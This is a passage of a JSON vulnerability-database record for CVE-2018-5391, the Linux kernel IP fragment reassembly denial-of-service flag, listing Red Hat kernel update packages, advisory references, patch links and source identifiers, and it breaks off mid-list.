7.2):\n\nSource:\nkernel-3.10.0-327.76.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.76.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm\nperf-3.10.0-327.76.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.2):\n\nSource:\nkernel-3.10.0-327.76.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.76.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm\nperf-3.10.0-327.76.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.2):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.2):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.2):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-18344\nhttps://access.redhat.com/security/cve/CVE-2018-5391\nhttps://access.redhat.com/security/cve/CVE-2018-10675\nhttps://access.redhat.com/security/cve/CVE-2018-14634\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/3553061\nhttps://access.redhat.com/security/vulnerabilities/mutagen-astronomy\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBW+sPDtzjgjWX9erEAQhm3BAAhxwzb8zJTfl0zFY/r9KUzkAdLXY4w39X\nBgJrVPyl7f6krvQ17HE95Poqz/iUhMOZAweypQXHMRKkmfMTYiLHlKpdIusou2xy\ny1ZzB1uloI4j2zMdTDRP5yZz06r/NP5A05pLZDA02iR5b07ALLYb5hcL5oBnpQXp\n9Xp31qb7TCP+jWtCO1Ot+9GJ3chMNvpYqH0OkGTpq/G7PxGrhIzB6v4p6N5OntD9\n5CIebREaGBWn9ViWiUHcthgg+PN2iS2/5ST82g/Jss/WmVVZSiVbayob6/MNQPnb\nM29VHOmJ6pf5dERNpSqrJrBXeDYCMA6HHD+RT9SmiuQQ8gQ2Rzjy7K97Nn++6x7O\nnclOTmB7hQZtl0WhgC3xuwtslXGpe9jKSzql03ijTvJRQrczgVWiBS+tpfVAJprV\nma2Kchf5ivctaXZ/R62JMyTvNf6HCVdvBNvSNET52ol3PkdpJK7V7mg+H64Mqdrl\ncBTUDBHHYYWMJted9pHWq7tPs0vy1h9aoFqNdlak5jwr169vldlZMRBbhtvz+OXj\nV/o+IClbY9UUfibaXDoX7qufeVikW1KQ4L+VhRj3RzXNsu2A8FUAcN7za5Qv5HIe\nLiC42C+pjvHqS/9gNpBakzKv6nPldWZIfPEuF4zewizBxlTXHPE1ln1hAWKjqVTs\n6QJ1Zh7jeUY=\n=8JOQ\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      },
      {
        "db": "BID",
        "id": "105108"
      },
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "db": "PACKETSTORM",
        "id": "150070"
      },
      {
        "db": "PACKETSTORM",
        "id": "150057"
      },
      {
        "db": "PACKETSTORM",
        "id": "148917"
      },
      {
        "db": "PACKETSTORM",
        "id": "149832"
      },
      {
        "db": "PACKETSTORM",
        "id": "150315"
      },
      {
        "db": "PACKETSTORM",
        "id": "150191"
      },
      {
        "db": "PACKETSTORM",
        "id": "150314"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-5391",
        "trust": 2.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#641765",
        "trust": 2.1
      },
      {
        "db": "BID",
        "id": "105108",
        "trust": 2.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/06/28/2",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/4",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/07/06/3",
        "trust": 1.8
      },
      {
        "db": "SIEMENS",
        "id": "SSA-377115",
        "trust": 1.8
      },
      {
        "db": "SECTRACK",
        "id": "1041476",
        "trust": 1.8
      },
      {
        "db": "SECTRACK",
        "id": "1041637",
        "trust": 1.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0545",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0623",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0854",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1315",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.0675",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-20-105-05",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "148928",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-135422",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5391",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150070",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150057",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148917",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149832",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150315",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150191",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150314",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148916",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "db": "BID",
        "id": "105108"
      },
      {
        "db": "PACKETSTORM",
        "id": "150070"
      },
      {
        "db": "PACKETSTORM",
        "id": "150057"
      },
      {
        "db": "PACKETSTORM",
        "id": "148917"
      },
      {
        "db": "PACKETSTORM",
        "id": "149832"
      },
      {
        "db": "PACKETSTORM",
        "id": "150315"
      },
      {
        "db": "PACKETSTORM",
        "id": "150191"
      },
      {
        "db": "PACKETSTORM",
        "id": "150314"
      },
      {
        "db": "PACKETSTORM",
        "id": "148916"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "id": "VAR-201809-1153",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      }
    ],
    "trust": 0.593355446
  },
  "last_update_date": "2024-07-23T19:24:37.507000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=84156"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182846 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183459 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182785 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182925 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-4272-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=c4fc75c3940ecd62e6e3d43c90c1ead1"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182791 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182924 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183590 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183540 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182933 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183586 - security advisory"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201903-11] linux-hardened: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201903-11"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe, linux-azure, linux-gcp vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3740-2"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerability in the Linux kernel affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-5391)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0e5803196f7b186e3c0e200d43325ad6"
      },
      {
        "title": "Red Hat: CVE-2018-5391",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2018-5391"
      },
      {
        "title": "Cisco: Linux Kernel IP Fragment Reassembly Denial of Service Vulnerability Affecting Cisco Products: August 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20180824-linux-ip-fragment"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-oem, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3740-1"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2018-5391"
      },
      {
        "title": "Ubuntu Security Notice: linux regressions",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3741-3"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3741-2"
      },
      {
        "title": "IBM: IBM Security Bulletin: This Power System update is being released to address CVE-2018-5391",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c5babfeb02fdf3e145c777d8eb6dfd0f"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3741-1"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to security vulnerability (CVE-2018-5391)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=cb5671de27781f97454cf1b56d2087e0"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM MQ Appliance is affected by a kernel vulnerability (CVE-2018-5391)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4b24750b4f4494d02c26c4b32a0e107a"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty regressions",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3742-3"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3742-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3742-1"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=d3eead9065d15844d9f0f319ebc3ef51"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2018-1058",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2018-1058"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2018-1058",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2018-1058"
      },
      {
        "title": "Palo Alto Networks Security Advisory: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=0944feb15e174ce784cc2c5c40d923ea"
      },
      {
        "title": "Red Hat: Important: kernel-alt security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182948 - security advisory"
      },
      {
        "title": "Palo Alto Networks Security Advisory: CVE-2018-5391 Information about FragmentSmack findings",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=3c616fb9e55ec6924cfd6ba2622c6c7e"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183083 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183096 - security advisory"
      },
      {
        "title": "Symantec Security Advisories: Linux Kernel Aug 2017 - Sep 2018 Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b3193a96468975c04eb9f136ca9abec4"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Security Guardium is affected by Red Hat kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=75b9d198a73a91d81765c8b428423224"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=204a1aa9ebf7b5f47151e8b011269862"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=05b5bbd6fb289370b459faf1f4e3919d"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=9cb9a8ed428c6faca615e91d2f1a216d"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM API Connect has addressed multiple vulnerabilities in Developer Portal\u2019s dependencies \u2013 Cumulative list from June 28, 2018 to December 13, 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=43da2cd72c1e378d8d94ecec029fcc61"
      },
      {
        "title": "my_ref",
        "trust": 0.1,
        "url": "https://github.com/chetanshirke/my_ref "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/ozipoetra/natvps-dns "
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "SamsungReleaseNotes",
        "trust": 0.1,
        "url": "https://github.com/samreleasenotes/samsungreleasenotes "
      },
      {
        "title": "BleepingComputer",
        "trust": 0.1,
        "url": "https://www.bleepingcomputer.com/news/security/windows-systems-vulnerable-to-fragmentsmack-90s-like-dos-bug/"
      },
      {
        "title": "BleepingComputer",
        "trust": 0.1,
        "url": "https://www.bleepingcomputer.com/news/linux/two-ddos-friendly-bugs-fixed-in-linux-kernel/"
      },
      {
        "title": "BleepingComputer",
        "trust": 0.1,
        "url": "https://www.bleepingcomputer.com/news/security/over-80-cisco-products-affected-by-fragmentsmack-dos-bug/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.0,
        "url": "http://www.securityfocus.com/bid/105108"
      },
      {
        "trust": 2.4,
        "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00017.html"
      },
      {
        "trust": 2.2,
        "url": "https://www.kb.cert.org/vuls/id/641765"
      },
      {
        "trust": 2.1,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=c30f1fc041b74ecdb072dd44f858750414b8b19f"
      },
      {
        "trust": 2.1,
        "url": "https://usn.ubuntu.com/3740-1/"
      },
      {
        "trust": 2.1,
        "url": "https://usn.ubuntu.com/3740-2/"
      },
      {
        "trust": 2.1,
        "url": "https://usn.ubuntu.com/3741-1/"
      },
      {
        "trust": 2.1,
        "url": "https://usn.ubuntu.com/3741-2/"
      },
      {
        "trust": 2.1,
        "url": "https://usn.ubuntu.com/3742-1/"
      },
      {
        "trust": 2.1,
        "url": "https://usn.ubuntu.com/3742-2/"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:2925"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:2948"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:3096"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:3459"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:3540"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/errata/rhsa-2018:3590"
      },
      {
        "trust": 1.8,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-004.txt"
      },
      {
        "trust": 1.8,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-linux-en"
      },
      {
        "trust": 1.8,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-377115.pdf"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20181003-0002/"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2018/dsa-4272"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2785"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2791"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2846"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2924"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:2933"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:3083"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2018:3586"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1041476"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1041637"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k74374841?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2018-5391"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5391"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18344"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/articles/3553061"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k74374841?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190541-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://security.business.xerox.com/wp-content/uploads/2019/11/cert_security_mini_bulletin_xrx19ak_for_altalinkb80xx-c80xx.pdf"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10872368"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1315/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/75930"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20190123-01-linux-cn"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76246"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10792535"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/76474"
      },
      {
        "trust": 0.6,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180824-linux-ip-fragment"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-105-05"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/77246"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20200115-01-linux-cn"
      },
      {
        "trust": 0.6,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-20-105-05"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2017-18344"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1609664"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
